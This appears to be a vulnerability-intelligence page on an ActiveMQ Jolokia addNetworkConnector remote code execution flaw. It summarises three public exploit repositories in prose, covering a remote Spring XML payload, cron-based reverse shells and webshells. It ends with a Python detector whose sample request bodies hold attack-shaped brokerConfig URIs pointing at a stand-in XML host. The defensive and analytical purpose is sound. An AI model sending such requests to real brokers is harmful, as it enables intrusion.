Apache ActiveMQ Classic Jolokia addNetworkConnector Remote Code Execution
CVE-2026-42588 is a remote code execution vulnerability in Apache ActiveMQ Classic affecting Apache ActiveMQ Broker, Apache ActiveMQ All, and Apache ActiveMQ before 5.19.7 and from 6.0.0 before 6.2.6. ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console, and the default Jolokia access policy permits exec operations on ActiveMQ MBeans under org.apache.activemq:*, including BrokerService.addNetworkConnector(String). An authenticated attacker can abuse this management path by invoking addNetworkConnector with a crafted discovery URI that triggers the VM transport's brokerConfig parameter via a "masterslave://" URL. This causes loading of a Spring XML application context through ResourceXmlApplicationContext. Because ResourceXmlApplicationContext instantiates singleton beans before BrokerService validates the configuration, attacker-controlled bean definitions can execute code on the broker JVM, including via bean factory methods such as Runtime.exec().
Exploits
3 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).
This repository is a minimal proof-of-concept exploit consisting of a single Spring XML bean definition file and a .gitattributes file. The XML PoC uses org.springframework.beans.factory.config.MethodInvokingFactoryBean twice: first to obtain a java.lang.Runtime instance via Runtime.getRuntime(), and then to invoke Runtime.exec() with a shell command. The hardcoded payload runs /bin/sh -c "touch /tmp/activemq_pwned", which creates a marker file to demonstrate successful code execution. The exploit’s core capability is arbitrary command execution, provided the target application deserializes, imports, or otherwise processes attacker-supplied Spring bean XML. There is no networking logic, delivery mechanism, authentication handling, or target discovery in the repository; it is only the malicious bean configuration payload. The attack is therefore best characterized as a file/web-delivered Spring XML RCE payload rather than a complete end-to-end exploit tool. Repository structure is extremely small: 2 total files, with 1 code-like artifact (the XML PoC). No framework affiliation is evident. Because the payload is hardcoded and functional, this is an operational PoC rather than a mere detection artifact.
Repository is a small standalone Python exploit for CVE-2026-42588 targeting Apache ActiveMQ Jolokia-authenticated RCE. Structure is simple: one main exploit script (CVE-2026-42588_EXP.py), one malicious Spring XML template (malicious.xml), dependency file, README, and CI metadata. The Python script uses requests and HTTP Basic Auth to interact with the target Jolokia endpoint at /api/jolokia/. It builds a JSON exec request against the default MBean org.apache.activemq:type=Broker,brokerName=localhost and invokes addNetworkConnector with a crafted masterslave:// URI containing brokerConfig=xbean:<remote_xml_url>. This causes the target to fetch attacker-controlled XML and instantiate Spring beans that execute OS commands. The script includes both detection logic (check whether Jolokia is reachable and optionally extract version info) and exploitation logic (send payload, handle HTTP/auth errors, and print guidance for asynchronous verification). The included malicious.xml demonstrates two execution paths: MethodInvokingFactoryBean calling Runtime.getRuntime().exec(), and ProcessBuilder with init-method="start". README documents prerequisites, vulnerable versions, example commands, reverse shell usage, Windows adaptation, and mitigations. Overall, this is a real operational exploit with a basic but functional payload chain rather than a mere detector.
This repository is a standalone Java Swing exploit toolkit for Apache ActiveMQ, not a Metasploit/Nuclei module. The project is Maven-based, with a single executable entry point in src/main/java/cc/kiiy/App.java that launches a GUI (MainFrame). The codebase is organized into service classes for exploitation/detection logic (EnvironmentService, VulnerabilityService), UI panels for each supported CVE and settings, and utility helpers for HTTP and local config handling.
Core capability-wise, the tool supports both detection and exploitation. EnvironmentService fingerprints ActiveMQ by requesting the target URL and checking for the Apache ActiveMQ title, and can authenticate to /admin/ using HTTP Basic auth to extract hostname, version, and uptime from the admin console HTML. VulnerabilityService is the main exploit engine. For CVE-2015-5254, it accepts a user-provided Base64 serialized payload, decodes it, wraps it into an ActiveMQObjectMessage, and sends it over OpenWire/JMS to a chosen queue on tcp://<host>:<port> (default 61616), enabling broker-side deserialization when the message is processed/viewed. For CVE-2016-3088, it performs a PUT to /fileserver/<random>.txt and then a MOVE to file:///etc/cron.d/root, planting a cron entry that launches a Perl reverse shell back to the operator. This is a real exploitation path, not just a detector, but it depends on vulnerable behavior and elevated target privileges.
The repository also includes support for CVE-2022-41678 workflows. Although the provided content truncates some of the implementation, the UI and service references clearly show functionality to write a default or custom webshell and then execute commands through it, with selectable methods such as auto, log4j2, and jfr. The included JfrTemplate.java contains a large embedded JFR configuration template, indicating one exploitation path abuses JFR-related file write/config behavior. BeanXmlPanel generates Spring BeanXML payloads using java.lang.ProcessBuilder for arbitrary command execution, likely intended to support XML-based ActiveMQ exploitation such as CVE-2023-46604-style xbean loading. The code also contains logic for a Jolokia-based probe labeled CVE-2026-34197 that sends an addNetworkConnector request with a vm://evil?brokerConfig=xbean:<xmlServer> argument, causing the target to fetch attacker-controlled XML from an external server.
Network and fingerprintable artifacts are abundant: HTTP(S) access to the target web console and admin paths, OpenWire TCP access to port 61616, PUT/MOVE requests to /fileserver/, file destinations like file:///etc/cron.d/root, attacker XML hosting URLs, and Basic Authorization headers. The GUI exposes global custom headers and proxy settings, allowing the operator to tune requests and route traffic through a local proxy. Overall, this is an operational multi-CVE ActiveMQ exploitation toolkit with a GUI front end, combining reconnaissance, authenticated checks, payload generation, deserialization delivery, arbitrary file write abuse, XML-based RCE testing, and webshell management.
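A defender-side check for the Jolokia request shape described above, added here as an example and not taken from the listed repositories or from Mallory: it classifies captured POST bodies sent to /api/jolokia/, marking any addNetworkConnector exec call for review and raising it to high when an argument carries a brokerConfig parameter. The sample bodies, the severity labels and the function names are constructed for illustration.

```python
import json
from urllib.parse import unquote

BROKER = "org.apache.activemq:type=Broker,brokerName=localhost"
# Constructed request bodies; the URIs are marker strings for the detector only.
SAMPLES = {
    "vm": json.dumps({"type": "exec", "mbean": BROKER, "operation": "addNetworkConnector",
        "arguments": ["vm://evil?brokerConfig=xbean:http://192.0.2.10/a.xml"]}),
    "bulk": json.dumps([{"type": "read", "mbean": BROKER, "attribute": "BrokerVersion"},
        {"type": "EXEC", "mbean": BROKER, "operation": "addNetworkConnector(java.lang.String)",
         "arguments": ["masterslave:MARKER-ONLY?broker%2543onfig=xbean:x"]}]),
    "static": json.dumps({"type": "exec", "mbean": BROKER, "operation": "addNetworkConnector",
        "arguments": ["static:(tcp://broker-b.example.internal:61616)"]}),
}

def _decode(value, rounds=3):
    # Percent-decode repeatedly so nested encoding cannot hide the marker.
    text = str(value)
    for _ in range(rounds):
        text, previous = unquote(text), text
        if text == previous:
            break
    return text.lower()

def classify(request):
    if not isinstance(request, dict) or str(request.get("type", "")).lower() != "exec":
        return None
    if not str(request.get("mbean", "")).startswith("org.apache.activemq:"):
        return None
    # Jolokia permits a signature suffix such as "op(java.lang.String)".
    operation = str(request.get("operation", "")).split("(")[0].strip().lower()
    if operation != "addnetworkconnector":
        return None
    args = request.get("arguments") or []
    # A brokerConfig parameter in a connector URI is the condition described above.
    if any("brokerconfig" in _decode(a) for a in (args if isinstance(args, list) else [args])):
        return "high"
    return "review"  # runtime topology change over HTTP: confirm it was planned

def scan_body(body):
    # Jolokia accepts a single request object or a bulk array of them.
    try:
        parsed = json.loads(body)
    except (TypeError, ValueError):
        return []
    items = parsed if isinstance(parsed, list) else [parsed]
    return [verdict for verdict in map(classify, items) if verdict]

if __name__ == "__main__":
    print({name: scan_body(body) for name, body in SAMPLES.items()})
```

The check needs request bodies, so it fits a reverse proxy or WAF log that records POST payloads; a plain access log with only the URL path will not show the operation or its arguments.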